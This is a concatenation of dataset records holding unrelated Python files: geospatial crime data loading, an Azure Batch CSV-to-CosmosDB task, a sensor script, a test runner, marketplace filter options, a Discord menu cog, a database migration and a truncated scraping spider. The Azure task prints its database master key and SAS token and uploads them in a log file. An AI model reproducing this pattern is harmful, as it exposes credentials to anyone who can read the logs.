processed...\")\n\t\ttoken = cursor.next()\n\t\tloc = token['location'].split(',')\n\t\tloc[0] = float(loc[0])\n\t\tloc[1] = float(loc[1])\n\t\tnear = {\"geometry\": {\"$near\": {\"$geometry\": {\"type\": \"Point\" ,\"coordinates\": loc } } } }\n\t\tnear = buffalo.cameras.find(near).limit(1).next()\n\t\tnearLoc = near['geometry']['coordinates']\n\t\tclosestCamera = distance.distance((nearLoc[1], nearLoc[0]), (loc[1], loc[0])).miles\n\t\tbuffalo.crimes.update_one( {\"_id\":token['_id']}, {\"$set\": { \"closestCamera\": closestCamera }} )\t\t\n\tprint(\"Crimes updated!\")\n\n\ndef readGeoJson(FILE_PATH):\n\twith open(FILE_PATH, 'r') as f:\n\t\treturn json.load(f)\n\ndef ingestGeoJsonFeatureToMongoDB(geojson, collection):\n\tfor feature in geojson['features']:\n\t\tcollection.insert_one(feature)\n\ndef readCSV(FILE_PATH):\n\tCSV = []\n\twith open(FILE_PATH, 'r') as F:\n\t\tCSV = list(csv.reader(F, quotechar='\"', delimiter=','))\n\treturn np.array(CSV)\n\ndef getJson(keys, values):\n\tpayload = {}\n\tfor i,j in zip(keys,values):\n\t\ttry:\n\t\t\tpayload[i] = float(j)\n\t\texcept:\n\t\t\tpayload[i] = j \n\treturn payload\n\n'''\nKnowing that you're receiving location points as (long, lat), because that is how\nMongoDB deal with location points, and you need to swap them for this function.\n'''\ndef getLength(loc1, loc2):\n\treturn distance.distance((loc1[1], loc1[0]), (loc2[1], loc2[0])).miles\n\n\t\t\t\t\t\n\nif __name__ == '__main__':\n\tmain()","sub_path":"src/scripts/loadBuffaloData.py","file_name":"loadBuffaloData.py","file_ext":"py","file_size_in_byte":3925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"413235813","text":"from __future__ import print_function\nimport argparse\nimport collections\nimport csv\nimport json\nimport os\nimport string\nimport time\nimport zipfile\n\nimport azure.storage.blob as azureblob\n\nimport pydocumentdb.documents as documents\nimport pydocumentdb.document_client as document_client\nimport pydocumentdb.errors as errors\n\n# Azure Batch Task which will be executed on the Azure Batch nodes.\n# It parses the given csv file and inserts the data into Azure CosmosDB.\n# Chris Joakim, Microsoft, 2018/09/13\n\ndef is_dev_env(args):\n if ('' + args.dev).lower() == 'true':\n return True\n else:\n return False\n\ndef is_azure_env(args):\n if is_dev_env(args):\n return False\n else:\n return True\n\ndef create_docdb_client(args):\n return document_client.DocumentClient(args.docdbhost, {'masterKey': args.docdbkey})\n\ndef write_log_data(blob_client, container, args, log_data):\n try:\n # see https://docs.microsoft.com/en-us/azure/batch/batch-compute-node-environment-variables\n job_id = str(os.environ.get('AZ_BATCH_JOB_ID'))\n task_id = str(os.environ.get('AZ_BATCH_TASK_ID'))\n output_file = '{}-{}-log_data.json'.format(job_id, task_id)\n output_file_path = os.path.realpath(output_file) \n log_json = json.dumps(log_data, sort_keys=True, indent=2)\n with open(output_file, 'w') as f:\n f.write(log_json)\n blob_client.create_blob_from_path(\n container,\n output_file,\n output_file_path)\n except KeyError:\n app_events.append('ERROR in write_log_data')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--filepath', required=True, help='The path to the zip file to process')\n parser.add_argument('--storageaccount', required=True, help='The name the Azure Storage account for results.')\n parser.add_argument('--storagecontainer', required=True, help='The Azure Blob storage container for results.')\n parser.add_argument('--sastoken', required=True, help='The SAS token providing write access to the Storage container.')\n parser.add_argument('--idx', required=True, help='The index number of the file within the job')\n parser.add_argument('--docdbhost', required=True, help='CosmosDB host, AZURE_COSMOSDB_DOCDB_URI')\n parser.add_argument('--docdbkey', required=True, help='CosmosDB key, AZURE_COSMOSDB_DOCDB_KEY')\n parser.add_argument('--dev', required=True, help='Specify True if local development on macOS/Windows')\n args = parser.parse_args()\n epoch = int(time.time())\n\n print('args.filepath: {}'.format(args.filepath))\n print('args.storageaccount: {}'.format(args.storageaccount))\n print('args.storagecontainer: {}'.format(args.storagecontainer))\n print('args.sastoken: {}'.format(args.sastoken))\n print('args.idx: {}'.format(str(args.idx)))\n print('args.docdbhost: {}'.format(args.docdbhost))\n print('args.docdbkey: {}'.format(args.docdbkey))\n print('args.dev: {}'.format(args.dev))\n print('is_dev_env: {}'.format(is_dev_env(args)))\n print('is_azure_env: {}'.format(is_azure_env(args)))\n print('epoch: {}'.format(epoch))\n\n # Create the blob client using the container's SAS token, and upload the unzipped csv file(s) to it.\n if is_azure_env(args):\n log_data = dict()\n app_events = list()\n log_data['epoch'] = epoch\n log_data['app_events'] = app_events\n log_data['storageaccount'] = args.storageaccount\n log_data['storagecontainer'] = args.storagecontainer\n log_data['sastoken'] = args.sastoken\n log_data['docdbhost'] = args.docdbhost\n log_data['docdbkey'] = args.docdbkey\n log_data['filepath'] = args.filepath\n log_data['dev'] = args.dev\n\n docdb_client = create_docdb_client(args)\n input_file = os.path.realpath(args.filepath)\n db_link = 'dbs/dev'\n coll_link = db_link + '/colls/zipdata'\n\n print('input_file: {}'.format(input_file))\n log_data['input_file'] = input_file\n log_data['coll_link'] = coll_link\n\n with open(input_file, 'rt') as csvfile:\n reader = csv.reader(csvfile, delimiter=',')\n header = None # id,postal_cd,country_cd,city_name,state_abbrv,latitude,longitude\n for idx, row in enumerate(reader):\n if idx < 1:\n header = row\n else:\n data = dict()\n for fidx, field in enumerate(header):\n data[field] = row[fidx] # add each field of the csv to the data dict\n\n data['pk'] = data['city_name'] # use city as the CosmosDB partition key\n data['seq'] = data['id'] # unset the 'id' from the csv, CosmosDB will populate it\n del data['id']\n\n # Add GPS info in GeoJSON format\n location, lat, lng = dict(), float(data['latitude']), float(data['longitude'])\n coordinates = [ lng, lat ]\n location['type'] = 'Point'\n location['coordinates'] = coordinates\n data['location'] = location\n\n doc = docdb_client.CreateDocument(coll_link, data)\n print(json.dumps(doc, sort_keys=False, indent=2))\n\n blob_client = azureblob.BlockBlobService(\n account_name=args.storageaccount,\n sas_token=args.sastoken)\n \n write_log_data(blob_client, args.storagecontainer, args, log_data)\n else:\n print('dev mode; no result blob processing')\n","sub_path":"examples/csv_etl_task.py","file_name":"csv_etl_task.py","file_ext":"py","file_size_in_byte":5643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"165958767","text":"import RPi.GPIO as GPIO\r\nimport time\r\n\r\ntrigPin = 16\r\nechoPin = 18\r\nMAX_DISTANCE = 300 # Define the maximum measured distance (in CM)\r\ntimeOut = MAX_DISTANCE*60 # Calculate timeout according to the maximum measured distance\r\n\r\ndef pulseIn(pin,level,timeOut): # Function pulseIn: Get the pulse time of a pin\r\n t0 = time.time()\r\n while(GPIO.input(pin) != level):\r\n if((time.time() - t0) > timeOut*0.000001):\r\n return 0;\r\n t0 = time.time()\r\n while(GPIO.input(pin) == level):\r\n if((time.time() - t0) > timeOut*0.000001):\r\n return 0;\r\n pulseTime = (time.time() - t0)*1000000\r\n return pulseTime\r\n \r\ndef getSonar(): # Response from UltraSonic sensor in CM\r\n GPIO.output(trigPin,GPIO.HIGH) # trigPin send 10us High Level signal\r\n time.sleep(0.00001) #10us\r\n GPIO.output(trigPin,GPIO.LOW)\r\n pingTime = pulseIn(echoPin,GPIO.HIGH,timeOut) # Read & Echo Time\r\n distance = pingTime * 340.0 / 2.0 / 10000.0 # Speed of Sound is 340m/s & calc distance\r\n return distance\r\n \r\ndef setup():\r\n print ('UltraSonix Script is starting...')\r\n GPIO.setmode(GPIO.BOARD) #numbers GPIOs by physical location\r\n GPIO.setup(trigPin, GPIO.OUT) \r\n GPIO.setup(echoPin, GPIO.IN) \r\n\r\ndef loop():\r\n while(True):\r\n distance = getSonar()\r\n print (\"The distance is : %.2f cm\"%(distance))\r\n time.sleep(1)\r\n \r\nif __name__ == '__main__': \r\n setup()\r\n try:\r\n loop()\r\n except KeyboardInterrupt: \r\n GPIO.cleanup() ","sub_path":"Local Scripts/UltraSonic.py","file_name":"UltraSonic.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"195775983","text":"# -*- coding: utf-8 -*-\n# ------------------------------------------------------------------------------\n# Name: multiprocesssTest.py\n# Purpose: Controller for all tests in project run concurrently.\n#\n# Authors: Michael Scott Cuthbert\n#\n# Copyright: Copyright © 2012-18 MIT DH Lab\n# forked from music21 Copyright © 2012-15\n# License: BSD, see license.txt\n# ------------------------------------------------------------------------------\n'''\nMultiprocess testing. Tests all doctests and Test unittest objects in all\nmodules that are imported when running \"import music21\". Runs threads on\neach core of a multicore system unless there are more than 2 cores, in which\ncase it runs on n-1 cores.\n\nN.B. this gets a slightly different set of modules than test/test.py does\nbecause the `imp` module is not available for threaded processing. Running\nboth modules gives great coverage of just about everything -- do that before\nbuilding a new release.\n\nRun testDocumentation after this.\n'''\nimport collections\nimport multiprocessing\nimport os\nimport sys\nimport tempfile\nimport time\nimport unittest\n\nfrom . import common\nfrom . import testRunner\nfrom . import commonTest\n\nModuleResponse = collections.namedtuple('ModuleResponse',\n 'returnCode fp moduleName success testRunner '\n + 'errors failures testsRun runTime')\nModuleResponse.__new__.__defaults__ = (None,) * len(ModuleResponse._fields)\n\n\n# ------------------------------------------------------------------------------\n\ndef run_one_module_without_imp(arguments):\n modGath, fp = arguments # modGather object, filepath\n verbosity = False\n timeStart = time.time()\n moduleObject = modGath.get_module_without_imp(fp)\n globs = common.import_main_module().__dict__.copy()\n\n # environLocal.printDebug('running %s \\n' % fp)\n if moduleObject == 'skip':\n success = '%s is skipped \\n' % fp\n # environLocal.printDebug(success)\n return ModuleResponse('Skipped', fp, success)\n elif moduleObject == 'notInTree':\n success = ('%s is in the directory but not imported in project. Skipped -- fix!' %\n modGath._getNamePeriod(fp))\n # environLocal.printDebug(success)\n return ModuleResponse(\"NotInTree\", fp, success)\n\n\n try:\n moduleName = modGath._getName(fp)\n\n s1 = commonTest.default_doctest_suite()\n\n # get Test classes in moduleObject\n if not hasattr(moduleObject, 'Test'):\n pass\n # environLocal.printDebug('%s has no Test class' % moduleObject)\n else:\n s2 = unittest.defaultTestLoader.loadTestsFromTestCase(moduleObject.Test)\n s1.addTests(s2)\n\n try:\n s3 = commonTest.default_doctest_suite(moduleObject, globs=globs)\n s1.addTests(s3)\n except ValueError:\n # environLocal.printDebug('%s cannot load Doctests' % moduleObject)\n pass\n\n testRunner.fixDoctests(s1)\n\n\n # environLocal.printDebug('running Tests...\\n')\n runner = commonTest.ProjectTestRunner(verbosity=verbosity)\n try:\n testResult = runner.run(s1)\n\n # need to make testResult pickleable by removing the instancemethod parts...\n errors = []\n for e in testResult.errors:\n errors.append(e[1])\n failures = []\n for f in testResult.failures:\n failures.append(f[1])\n runTime = round(10 * (time.time() - timeStart)) / 10.0\n return ModuleResponse(\"TestsRun\", fp, moduleName, testResult.wasSuccessful(),\n str(testResult), errors, failures, testResult.testsRun, runTime)\n except Exception as excp: # pylint: disable=broad-except\n # environLocal.printDebug('*** Exception in running %s: %s...\\n' % (moduleName, excp))\n return ModuleResponse(\"TrappedException\", fp, moduleName, None, str(excp))\n except Exception as excp: # pylint: disable=broad-except\n # environLocal.printDebug('*** Large Exception in running %s: %s...\\n' % (fp, excp))\n return ModuleResponse(\"LargeException\", fp, None, None, str(excp))\n\n\ndef main(test_group=None):\n '''\n Run all tests. test_group is not used (always the test suite)\n '''\n normalStdError = sys.stderr\n\n timeStart = time.time()\n poolSize = common.cpus()\n\n print('Creating %d processes for multiprocessing' % poolSize)\n\n modGather = commonTest.ModuleGather(useExtended=True)\n\n maxTimeout = 200\n pathsToRun = modGather.modulePaths # [30:60]\n\n pool = multiprocessing.Pool(processes=poolSize) # @UndefinedVariable # pylint: disable=not-callable\n\n # imap returns the results as they are completed. Since the number of files is small,\n # the overhead of returning is outweighed by the positive aspect of getting results immediately\n # unordered says that results can RETURN in any order; not that they'd be pooled out in any\n # order.\n modGather_with_fp = [(modGather, fp) for fp in pathsToRun]\n res = pool.imap_unordered(run_one_module_without_imp, modGather_with_fp)\n\n continueIt = True\n timeouts = 0\n eventsProcessed = 0\n summaryOutput = []\n\n while continueIt is True:\n try:\n newResult = res.next(timeout=1)\n if timeouts >= 5:\n print(\"\")\n if newResult is not None:\n if newResult.moduleName is not None:\n mn = str(newResult.moduleName)\n mn = mn.replace('___init__', '')\n mn = mn.replace('_', '.')\n else:\n mn = \"\"\n rt = newResult.runTime\n if rt is not None:\n rt = round(newResult.runTime * 10) / 10\n if not newResult.errors and not newResult.failures:\n print(\"\\t\\t\\t\\t{0}: {1} tests in {2} secs\".format(\n mn,\n newResult.testsRun,\n rt))\n else:\n print(\"\\t\\t\\t\\t{0}: {1} tests, {2} errors {3} failures in {4} secs\".format(\n mn,\n newResult.testsRun,\n len(newResult.errors),\n len(newResult.failures),\n rt))\n timeouts = 0\n eventsProcessed += 1\n summaryOutput.append(newResult)\n except multiprocessing.TimeoutError: # @UndefinedVariable\n timeouts += 1\n if timeouts == 5 and eventsProcessed > 0:\n print(\"Delay in processing, seconds: \", end=\"\")\n elif timeouts == 5:\n print(\"Starting first modules, should take 5-10 seconds: \", end=\"\")\n\n if timeouts % 5 == 0:\n print(str(timeouts) + \" \", end=\"\", flush=True)\n if timeouts > maxTimeout and eventsProcessed > 0:\n print(\"\\nToo many delays, giving up...\", flush=True)\n continueIt = False\n printSummary(summaryOutput, timeStart, pathsToRun)\n pool.close()\n exit()\n except StopIteration:\n continueIt = False\n pool.close()\n pool.join()\n except Exception as excp: # pylint: disable=broad-except\n eventsProcessed += 1\n exceptionLog = ModuleResponse(\"UntrappedException\", None, \"%s\" % excp)\n summaryOutput.append(exceptionLog)\n\n sys.stderr = normalStdError\n printSummary(summaryOutput, timeStart, pathsToRun)\n\n\ndef printSummary(summaryOutput, timeStart, pathsToRun):\n outStr = ''\n summaryOutputTwo = [i[1] for i in summaryOutput]\n for fp in pathsToRun:\n if fp not in summaryOutputTwo:\n failLog = ModuleResponse(\"NoResult\", fp)\n summaryOutput.append(failLog)\n\n totalTests = 0\n\n skippedSummary = []\n successSummary = []\n errorsFoundSummary = []\n otherSummary = []\n for moduleResponse in summaryOutput:\n print(moduleResponse)\n if moduleResponse.returnCode == 'Skipped':\n skippedSummary.append(\"Skipped: %s\" % moduleResponse.fp)\n elif moduleResponse.returnCode == 'NoResult':\n otherSummary.append(\"Silent test fail for %s: Run separately!\" % moduleResponse.fp)\n elif moduleResponse.returnCode == 'UntrappedException':\n otherSummary.append(\"Untrapped Exception for unknown module: %s\" % moduleResponse.fp)\n elif moduleResponse.returnCode == 'TrappedException':\n otherSummary.append(\"Trapped Exception for module %s, at %s: %s\" %\n (moduleResponse.moduleName,\n moduleResponse.fp,\n moduleResponse.testRunner))\n elif moduleResponse.returnCode == 'LargeException':\n otherSummary.append(\"Large Exception for file %s: %s\" %\n (moduleResponse.fp, moduleResponse.testResult))\n elif moduleResponse.returnCode == 'ImportError':\n otherSummary.append(\"Import Error for %s\" % moduleResponse.fp)\n elif moduleResponse.returnCode == 'NotInTree':\n if moduleResponse.moduleName == \"\":\n otherSummary.append(\"Not in Tree Error: %s \" % moduleResponse.moduleName)\n elif moduleResponse.returnCode == 'TestsRun':\n totalTests += moduleResponse.testsRun\n if moduleResponse.success:\n successSummary.append(\"%s successfully ran %d tests in %d seconds\"\n % (moduleResponse.moduleName,\n moduleResponse.testsRun,\n moduleResponse.runTime))\n else:\n errorsList = moduleResponse.errors\n # not the original errors list! see pickle note above\n failuresList = moduleResponse.failures\n errorsFoundSummary.append(\n \"\\n-----------------------------\\n\"\n + \"%s had %d ERRORS and %d FAILURES in %d tests after %d seconds:\\n\" %\n (moduleResponse.moduleName, len(errorsList),\n len(failuresList), moduleResponse.testsRun, moduleResponse.runTime)\n + \"-----------------------------\\n\")\n\n for e in errorsList:\n outStr += e + \"\\n\"\n errorsFoundSummary.append('%s' % (e))\n for f in failuresList:\n outStr += f + \"\\n\"\n errorsFoundSummary.append('%s' % (f))\n else:\n otherSummary.append(\"Unknown return code %s\" % moduleResponse)\n\n\n outStr += \"\\n\\n---------------SUMMARY---------------------------------------------------\\n\"\n for l in skippedSummary:\n outStr += l + \"\\n\"\n for l in successSummary:\n outStr += l + \"\\n\"\n for l in otherSummary:\n outStr += l + \"\\n\"\n for l in errorsFoundSummary:\n outStr += l + \"\\n\"\n outStr += \"-------------------------------------------------------------------------\\n\"\n elapsedTime = time.time() - timeStart\n outStr += \"Ran %d tests in %.4f seconds\\n\" % (totalTests, elapsedTime)\n sys.stdout.flush()\n print(outStr)\n sys.stdout.flush()\n\n import datetime\n lastResults = os.path.join(tempfile.gettempdir(), 'lastResults.txt')\n with open(lastResults, 'w') as f:\n f.write(outStr)\n f.write(\"Run at \" + datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"))\n\n print(\"Results at \" + lastResults)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"dh_testers/multiprocess.py","file_name":"multiprocess.py","file_ext":"py","file_size_in_byte":11834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"114531201","text":"from collections import OrderedDict\nfrom ob.models import Listing, Profile\nfrom django.conf import settings\nfrom django.utils.translation import ugettext_lazy as _\nfrom .util import build_options, build_checkbox\nfrom .common import get_nsfw_options, get_currency_type_options, \\\n get_clear_all_options, get_network_options\nfrom .static import country_list\n\n\ndef get_listing_options(params):\n available_options = [\n (\"acceptedCurrencies\", {\n \"type\": \"checkbox\",\n \"label\": _(\"Accepted Currencies\"),\n \"options\": get_currency_type_options(params)\n }),\n (\"moderator_verified\", {\n \"type\": \"checkbox\",\n \"label\": _(\"Verified Moderator\"),\n \"options\": get_moderator_verified_options(params)\n }),\n (\"moderator_count\", {\n \"type\": \"radio\",\n \"label\": _(\"Moderators Available\"),\n \"options\": get_moderator_options(params)\n }),\n (\"nsfw\", {\n \"type\": \"radio\",\n \"label\": _(\"Adult Content\"),\n \"options\": get_nsfw_options(params)\n }),\n (\"condition_type\", {\n \"type\": \"radio\",\n \"label\": _(\"Condition\"),\n \"options\": get_condition_type_options(params)\n }),\n (\"rating\", {\n \"type\": \"radio\",\n \"label\": _(\"Rating\"),\n \"options\": get_rating_options(params)\n }),\n (\"contract_type\", {\n \"type\": \"radio\",\n \"label\": _(\"Type\"),\n \"options\": get_contract_type_options(params)\n }),\n (\"shipping\", {\n \"type\": \"dropdown\",\n \"label\": _(\"Ships to\"),\n \"options\": get_region_options(params)\n }),\n (\"free_shipping_region\", {\n \"type\": \"checkbox\",\n \"label\": _(\"Ships Free\"),\n \"options\": get_free_shipping_options(params)\n }),\n (\"connection\", {\n \"type\": \"radio\",\n \"label\": _(\"Connection Type (Alpha)\"),\n \"options\": get_connection_options(params)\n }),\n (\"network\", {\n \"type\": \"radio\",\n \"label\": _(\"Network\"),\n \"options\": get_network_options(params)\n }),\n (\"dust\", {\n \"type\": \"checkbox\",\n \"label\": _(\"Show Dust\"),\n \"options\": get_dust_options(params)\n }),\n (\"clear_all\", {\n \"type\": \"checkbox\",\n \"label\": _(\"Reset\"),\n \"options\": get_clear_all_options()\n }),\n ]\n\n if settings.DEV:\n from .dev import get_debug_options\n available_options += get_debug_options(params)\n\n options = OrderedDict(available_options)\n\n return options\n\n\ndef get_moderator_verified_options(params):\n # Build verified moderator options\n\n if 'moderator_verified' in params.keys():\n try:\n if params['moderator_verified'] == 'true':\n moderator_verified = True\n elif params['moderator_verified'] == 'false':\n moderator_verified = ''\n elif params['moderator_verified'] == '':\n moderator_verified = ''\n else:\n moderator_verified = ''\n except ValueError:\n moderator_verified = ''\n else:\n moderator_verified = ''\n\n moderator_verified_choices = dict([(True, 'OB1 Verified Moderator'), ])\n\n return build_options(moderator_verified, moderator_verified_choices)\n\n\ndef get_moderator_options(params):\n # Build number of moderator options\n\n if 'moderator_count' in params.keys():\n try:\n moderator_count = int(params['moderator_count'])\n except ValueError:\n moderator_count = 0\n else:\n moderator_count = 0\n\n moderator_options = [\n {\n \"value\": v,\n \"label\": '\\u2696' * v + ' ' + str(v) + '+',\n \"checked\": v == moderator_count,\n \"default\": False\n } for v in range(3, -1, -1)\n ]\n moderator_options[1]['default'] = True\n\n return moderator_options\n\n\ndef get_region(params):\n return params['shipping'] if 'shipping' in params.keys() else 'any'\n\n\ndef get_region_options(params):\n region = get_region(params)\n\n distinct_region = OrderedDict(\n country_list\n )\n\n return build_options(region, distinct_region)\n\n\ndef get_free_shipping_options(params):\n try:\n free_shipping = True if params['free_shipping_region'] == 'true' else ''\n except ValueError:\n free_shipping = ''\n region = get_region(params)\n if region and region.lower() != 'any':\n to_str = _('to {place}').format(place=region.title().replace('_', ' '))\n free_shipping_choices = OrderedDict([(True, to_str), ])\n else:\n free_shipping_choices = OrderedDict([(True, _('to Anywhere')), ])\n return build_options(free_shipping, free_shipping_choices)\n\n\ndef get_contract_type_options(params):\n try:\n contract = int(params['contract_type'])\n except (ValueError, KeyError):\n contract = ''\n\n return build_options(contract, Listing.CONTRACT_TYPE_DICT)\n\n\ndef get_condition_type_options(params):\n try:\n condition = int(params['condition_type'])\n except (ValueError, KeyError):\n condition = ''\n\n return build_options(condition, Listing.CONDITION_TYPE_DICT)\n\n\ndef get_rating_options(params):\n try:\n rating = float(params['rating'])\n except (ValueError, KeyError):\n rating = 0\n\n return [\n {\n \"value\": v,\n \"label\": \"{:.2f}\".format(v) + ' >=',\n \"checked\": v == rating,\n \"default\": False\n } for v in [5.0, 4.95, 4.8, 4.5, 4.0, 0.0]\n ]\n\n\ndef get_connection_options(params):\n try:\n connection = int(params['connection'])\n except (ValueError, KeyError):\n connection = ''\n return build_options(connection, Profile.CONNECTION_TYPE_DICT)\n\n\ndef get_dust_options(params):\n try:\n dust = True if params['dust'] == 'true' else False\n\n except (ValueError, KeyError):\n dust = ''\n dust_str = _('> ~{p}% Bitcoin Fee').format(p=settings.DUST_FEE_PERCENT)\n dust_choices = OrderedDict([(True, dust_str), ])\n return build_options(dust, dust_choices)\n","sub_path":"ob/api/param/listing.py","file_name":"listing.py","file_ext":"py","file_size_in_byte":6230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"213067503","text":"# This is designed to be used with Zoidberg bot, however I'm sure it could be adapted to work with your own projects.\n# If there is an issue that might cause issue on your own bot, feel free to pull request if it will improve something.<3\nimport discord\nfrom discord.ext import commands\nfrom dislash import *\n\nfrom bot import guilds\nfrom zoidbergbot.paginate import Element\n\n\nasync def create_menu(ctx: SlashInteraction, menu):\n # Build buttons\n button_row_1 = ActionRow(\n Button(\n style=ButtonStyle.blurple,\n emoji=\"⬆\",\n custom_id=\"up\"\n ),\n Button(\n style=ButtonStyle.green,\n label=\"Select\",\n custom_id=\"select\"\n )\n )\n button_row_2 = ActionRow(\n Button(\n style=ButtonStyle.blurple,\n emoji=\"⬇\",\n custom_id=\"down\"\n ),\n Button(\n style=ButtonStyle.red,\n label=\"Back\",\n custom_id=\"back\"\n )\n )\n # Send a message with buttons\n emb = discord.Embed(\n title=menu.header,\n description=f\"{menu.long_desc}\\n\\n{menu.display_elements()}\"\n )\n msg = await ctx.send(embed=emb, components=[button_row_1, button_row_2])\n\n # Click manager usage\n\n on_click = msg.create_click_listener(timeout=60)\n\n @on_click.matching_id(\"down\")\n async def down(inter):\n menu.next_elem()\n\n @on_click.matching_id(\"up\")\n async def up(inter):\n menu.prev_elem()\n\n @on_click.matching_id(\"select\")\n async def select(inter):\n nonlocal menu\n menu = menu.element\n\n @on_click.matching_id(\"back\")\n async def back(inter):\n nonlocal menu\n menu = menu.parent\n\n @on_click.no_checks()\n async def response(inter):\n emb.title = menu.header\n emb.description = f\"{menu.long_desc}\\n\\n{menu.display_elements()}\"\n await inter.reply(embed=emb, type=ResponseType.UpdateMessage)\n\n @on_click.timeout\n async def on_timeout():\n for button in button_row_1.components:\n button.disabled = True\n for button in button_row_2.components:\n button.disabled = True\n await msg.edit(embed=emb, components=[button_row_1, button_row_2])\n\n\nclass Help(commands.Cog):\n \n def __init__(self, bot):\n self.bot = bot\n\n @slash_commands.command(name='music-help',\n description='Provides information on how to use the music commands. ', \n testing_guilds=guilds)\n async def cmd_music_help(self, ctx:SlashInteraction):\n menu = Element(\n header=\"Music commands\",\n long_desc=\"Navigate through all the entries\",\n elements=[\n Element(\n header=\"/connect \",\n long_desc=\"Connects the bot to a channel and creates a player.\\n\"\n \"This command is automatically executed if you are not in a channel.\"\n ),\n Element(\n header=\"/play \",\n long_desc=\"Starts playing a song in the currently connected channel.\\n\"\n \"If you are not in a channel, it will automatically connect.\\n\\n\"\n \"This command supports playing from youtube, bandcamp, soundcloud, twitch, vimeo and direct http streams.\"\n ),\n Element(\n header=\"/pause\",\n long_desc=\"Pauses playback. \"\n ),\n Element(\n header=\"/resume\",\n long_desc=\"Resumes playback. \"\n ),\n Element(\n header=\"/skip\",\n long_desc=\"Skips the currently playing song. \"\n ),\n Element(\n header=\"/volume\",\n long_desc=\"Sets the volume of the player. \"\n ),\n Element(\n header=\"/now_playing\",\n long_desc=\"Displays the currently playing song. \"\n ),\n Element(\n header=\"/queue\",\n long_desc=\"Displays the queue of the player. \"\n ),\n Element(\n header=\"/stop\",\n long_desc=\"Stops playback. \"\n ),\n Element(\n header=\"/nodes\",\n long_desc=\"Displays information about the connected nodes. \"\n )\n ]\n )\n create_menu(ctx, menu)\n\ndef setup(bot):\n bot.add_cog(Help(bot))\n","sub_path":"cogs/help.py","file_name":"help.py","file_ext":"py","file_size_in_byte":4474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"604677732","text":"\"\"\"empty message\n\nRevision ID: 553736fc1724\nRevises: a9f4f67bb099\nCreate Date: 2018-07-14 00:36:56.675417\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = '553736fc1724'\ndown_revision = 'a9f4f67bb099'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index('ix_tags_name', table_name='tags')\n op.drop_table('article_tag')\n op.drop_table('tags')\n op.add_column('articles', sa.Column('tags', sa.String(length=120), nullable=False))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('articles', 'tags')\n op.create_table('tags',\n sa.Column('id', sa.INTEGER(), nullable=False),\n sa.Column('utc_created', postgresql.TIMESTAMP(), autoincrement=False, nullable=True),\n sa.Column('utc_updated', postgresql.TIMESTAMP(), autoincrement=False, nullable=True),\n sa.Column('name', sa.VARCHAR(length=20), autoincrement=False, nullable=False),\n sa.Column('is_enable', sa.BOOLEAN(), autoincrement=False, nullable=True),\n sa.PrimaryKeyConstraint('id', name='tags_pkey')\n )\n op.create_table('article_tag',\n sa.Column('article_id', sa.INTEGER(), autoincrement=False, nullable=False),\n sa.Column('tag_id', sa.INTEGER(), autoincrement=False, nullable=False),\n sa.ForeignKeyConstraint(['article_id'], ['articles.id'], name='article_tag_article_id_fkey'),\n sa.ForeignKeyConstraint(['tag_id'], ['tags.id'], name='article_tag_tag_id_fkey')\n )\n op.create_index('ix_tags_name', 'tags', ['name'], unique=True)\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/553736fc1724_.py","file_name":"553736fc1724_.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"294867740","text":"# -*- coding: utf8 -*-\nfrom alascrapy.spiders.base_spiders.ala_spider import AlaSpider\n\nTEST_SCALE = 100\n\n\nclass Digitalt_tvSpider(AlaSpider):\n name = 'digitalt_tv'\n allowed_domains = ['digitalt.tv']\n start_urls = ['https://digitalt.tv/kategori/anmeldelser/']\n\n def parse(self, response):\n review_urls_xpath = \"//h3[@class='post-title']/a/@href\"\n review_urls = self.extract_list(response.xpath(review_urls_xpath))\n next_page_xpath = \"//a[@rel='next']/@href\"\n\n for review_url in review_urls:\n yield response.follow(review_url,\n callback=self.parse_review_product)\n\n next_page = self.extract(response.xpath(next_page_xpath))\n if next_page:\n yield response.follow(next_page,\n callback=self.parse)\n\n def parse_review_product(self, response):\n product = self.parse_product(response)\n review = self.parse_review(response)\n yield product\n yield review\n\n def get_product_name(self, response):\n name_xpath = \"//meta[@property='og:title']/@content\"\n name_ = self.extract(response.xpath(name_xpath))\n name = name_.split(u'–')\n if name[0]:\n productname = name[0].replace(\n 'Test: ', '').replace('Test', '').replace('test', '')\n else:\n productname = name_xpath.replace('Test', '').replace('test', '')\n\n return productname\n\n def parse_product(self, response):\n product_xpaths = {\n 'PicURL': '//meta[@property=\"og:image\"]/@content',\n 'OriginalCategoryName': \"//meta[@property='article:section']\"\n \"/@content\",\n 'ProductManufacturer': \"//meta[@property='article:tag']/@content\",\n 'source_internal_id': \"substring-after(\"\n \"//link[@rel='shortlink']/@href, '=')\"\n }\n\n product = self.init_item_by_xpaths(response, 'product', product_xpaths)\n product[\"ProductName\"] = self.get_product_name(response)\n\n return product\n\n def parse_review(self, response):\n review_xpaths = {\n 'TestTitle': '//meta[@property=\"og:title\"]/@content',\n 'source_internal_id': \"substring-after(\"\n \"//link[@rel='shortlink']/@href, '=')\",\n 'Author': \"//a[@rel='author']/text()\",\n \"SourceTestRating\": \"//span[@property='ratingValue']/text()\",\n \"TestDateText\": \"substring-before(\"\n \"//meta[@property='article:published_time']/@content,'T')\",\n 'TestSummary': '//meta[@property=\"og:description\"]/@content',\n 'TestPros': \"//div[@class='rwp-pros']/li/text()|\"\n 